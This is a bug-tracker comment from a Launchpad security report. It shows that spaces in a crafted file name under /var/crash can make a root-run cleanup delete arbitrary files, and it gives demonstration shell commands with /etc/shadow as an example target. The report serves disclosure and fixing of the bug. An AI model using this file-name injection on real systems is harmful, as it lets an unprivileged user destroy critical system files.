Comment 3 for bug 973687
Revision history for this message
| Steve Beattie (sbeattie) wrote Re: can cause root user to remove arbitrary files from / and /var/crash | #3 |
© 2004
Canonical Ltd.
•
Terms of use
•
Data privacy
•
Contact Launchpad Support
•
Blog
•
Careers
•
System status
•
bbfa235
(Get the code!)
Uh, it's more serious than just files in / and /var/crash, you can delete any file on the filesystem with this. e.g.
$ mkdir '/var/crash/chicken monkey/'
$ touch /var/crash/chicken\ monkey/fling\ duck.uploaded
$ find /var/crash -name '*.uploaded' -type f -size 0 | sed 's,\(.*
/var/crash/chicken monkey/fling duck.upload /var/crash/chicken monkey/fling duck.uploaded
i.e. it will attempt to delete monkey/fling; obviously anything else can be substituted for monkey/fling, like say etc/shadow.